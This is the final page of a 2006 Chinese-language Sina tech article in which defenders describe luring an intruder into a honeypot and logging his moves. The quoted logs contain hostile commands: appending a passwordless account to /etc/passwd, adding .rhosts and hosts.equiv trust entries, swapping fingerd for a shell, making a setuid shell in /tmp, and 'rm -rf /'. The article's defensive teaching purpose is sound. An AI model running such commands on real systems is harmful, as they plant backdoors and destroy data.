科技时代新浪首页 > 科技时代 > 学园 > 正文

战术实例讲解 网络欺骗的方法以及攻防(3)


http://www.sina.com.cn 2006年08月09日 10:56 天极yesky

  4、寻踪

  这样几天没有动静,估计这个入侵者不死心,在考虑该怎么来修改密码文件了。其实,到这一步,我们完全可以把机器的补丁打上,不过,玩就要玩个痛快。不过,我们也在纳闷,这个入侵者不会知难而退了吧,还是有其他的工作在忙呢?静悄悄的,我们等待着。

  星期五的晚上,一个难得的周末。机房监控的终端报告有安全事件,我们的入侵检测系统也时不时地报告有些错误发生。核对日志后,我们发现,有人试图使用DEBUG来用ROOT身份执行命令,也就是说,他试图修改我们的密码文件,一切尽在不言中,我不得不佩服这个入侵者的耐心和智慧!查看日志,我们发现,这次入侵同样是来自上次的连接:hust.whnet.edu。我们开始思考:现在到底是“诱敌深入”?还是“引狼入室”?从感觉来看,这个黑客比我们想象中的要厉害,而且他对现在的系统和系统漏洞相当的了解。难道我们要做的就是“拔掉网线”吗?思索中,一切仍然在进行中。

  出于真实性考虑,我们在采取一些信息迷惑的同时,也公布了一些让黑客进入的诱饵。其中ftp的passwd是真实的,另外还生成了一个账号,但却使它不可操作。同时,又要让入侵者以为他自己已经改变了passwd文件,但却不急于让他进来。因此还需要给这个入侵者创造一定的条件。于是,我生成了一个临时账号c,当它被调用时就会给我发信,为了保险起见,我把c账号在实际passwd文件中改成了cndes,当我作完后,这个入侵者继续尝试:

以下是引用片段:
00:44 echo "cndes ::301:1::/:/bin/sh" >> /etc/passwd

  他尝试了几个命令,但是没有成功,终于他发现了cndes这个账号,于是产生了下面的日志:

以下是引用片段:
00:51 Attempt to login to inet with cndes from hust.whnet.edu
00:51 Attempt to login to inet with cndes from hust.whnet.edu
00:55 echo "cndes ::303:1::/tmp:/bin/sh" >> /etc/passwd
00:57 (Added cndes to the real password file.)
00:58 Attempt to login to inet with cndes from hust.whnet.edu
00:58 Attempt to login to inet with cndes from hust.whnet.edu
01:05 echo "36.92.0.205" >/dev/null
echo "36.92.0.205 hust.whnet.edu">>/etc./?H?H?H
01:06 Attempt to login to inet with guest from rice-chex.ai.mit.edu
01:06 echo "36.92.0.205 hust.whnet.edu" >> /etc/hosts
01:08 echo "hust.whnet.edu cndes">>/tmp/.rhosts

  这时,这个入侵者的活动又转到了ftp上:

以下是引用片段:
Feb 20 01:36:48 inet ftpd[14437]: <--- 220 inet FTP server
(Version 4.265 Fri Feb 2 13:39:38 EST 1990) ready.
Feb 20 01:36:55 inet ftpd[14437]: -------> user cndes?M
Feb 20 01:36:55 inet ftpd[14437]: <--- 331 Password required for cndes.
Feb 20 01:37:06 inet ftpd[14437]: -------> pass?M
Feb 20 01:37:06 inet ftpd[14437]: <--- 500 'PASS': command not understood.
Feb 20 01:37:13 inet ftpd[14437]: -------> pass?M
Feb 20 01:37:13 inet ftpd[14437]: <--- 500 'PASS': command not understood.
Feb 20 01:37:24 inet ftpd[14437]: -------> HELP?M
Feb 20 01:37:24 inet ftpd[14437]: <--- 214- The following commands are
recognized (* =>'s unimplemented).
Feb 20 01:37:24 inet ftpd[14437]: <--- 214 Direct comments to ftp-bugs@inet.
Feb 20 01:37:31 inet ftpd[14437]: -------> QUIT?M
Feb 20 01:37:31 inet ftpd[14437]: <--- 221 Goodbye.
Feb 20 01:37:31 inet ftpd[14437]: Logout, status 0
Feb 20 01:37:31 inet inetd[116]: exit 14437
Feb 20 01:37:41 inet inetd[116]: finger request from 202.103.0.117 pid 14454
Feb 20 01:37:41 inet inetd[116]: exit 14454
01:38 finger attempt on cndes
01:48 echo "36.92.0.205 hust.whnet.edu" >> /etc/hosts.equiv
01:53 mv /usr/etc/fingerd /usr/etc/fingerd.b
cp /bin/sh /usr/etc/fingerd

  看的出,他在这方面是很在行的,幸运的是,他只是破坏了我们模拟机器上的finger而已,并没有将之替换成一个shell程序。我关闭了实际fingerd程序。黑客的活动仍然在继续,摘录的相关日志如下:

以下是引用片段:
01:57 Attempt to login to inet with cndes from hust.whnet.edu
01:58 cp /bin/csh /usr/etc/fingerd
02:07 cp /usr/etc/fingerd.b /usr/etc/fingerd 

  按照他的意思,fingerd现在重新开始工作。现在他试图修改password,不过,这永远不会成功,因为passwd的输入是/dev/tty,而不是sendmail所执行的shell script。攻击在继续中:

以下是引用片段:
02:16 Attempt to login to inet with cndes from hust.whnet.edu
02:17 echo "/bin/sh" > /tmp/Shell
chmod 755 /tmp/shell
chmod 755 /tmp/Shell
02:19 chmod 4755 /tmp/shell
02:19 Attempt to login to inet with cndes from hust.whnet.edu
02:19 Attempt to login to inet with cndes from hust.whnet.edu
02:21 Attempt to login to inet with cndes from hust.whnet.edu
02:21 Attempt to login to inet with cndes from hust.whnet.edu

  又是一番折腾,连续的战斗,已经让我们疲惫不堪了,不过,这位入侵者也应该很疲惫了。突然,我发现了一个新的日志:

以下是引用片段:
02:55 rm -rf /&

  看来他试图删除所有进入的痕迹,估计他很累了。但是,对于这个黑客来说,“没有进行破坏”是说不过去的,根据计算机安全的基本原则,当数据的"完整性、可用性和机密性"中任意三者之一在受到破坏的时候,都应视为安全受到了破坏。在实际情况中,间谍们只是默默地拿走你的数据而绝不做任何的破坏,而且尽最大可能地掩盖自己行动的痕迹。这些黑客希望长时间大量地得到珍贵的数据而不被发觉,这其实是最可怕的一种攻击行为。看来,今天碰到的这个黑客确实很职业,不过,他没有意识到我们给他布置的“局”,徒劳的长时间攻击之后,他选择了退出。我们也很累了,不过,现在最要紧的,就是马上恢复并且马上打上最新的sendmail系统补丁了。

  随着计算机安全技术的发展,计算机网络将日益成为工业、农业和国防等方面的重要信息交换手段,渗透到社会生活的各个领域。因此,认清网络的脆弱性和潜在威胁,采取强有力的安全策略,对于保障网络的安全性将变得十分重要。同时,计算机网络技术目前正处于蓬勃发展的阶段,新技术层出不穷,其中也不可避免地存在一些漏洞,因此,进行网络防范要不断追踪新技术的应用情况,同时要把握黑客的心理,做到“知己知彼,百战不殆”,从而逐渐完善自身的防御措施。

[上一页] [1] [2] [3]

本文导航:
·网络欺骗方法探幽
·欺骗实例之“诱敌深入”
·寻踪与较量

发表评论

爱问(iAsk.com) 相关网页共约486,000



评论】【论坛】【收藏此页】【 】【多种方式看新闻】【下载点点通】【打印】【关闭




科技时代意见反馈留言板 电话:010-82628888-5595   欢迎批评指正

新浪简介 | About Sina | 广告服务 | 联系我们 | 招聘信息 | 网站律师 | SINA English | 会员注册 | 产品答疑

Copyright © 1996 - 2006 SINA Inc. All Rights Reserved

新浪公司 版权所有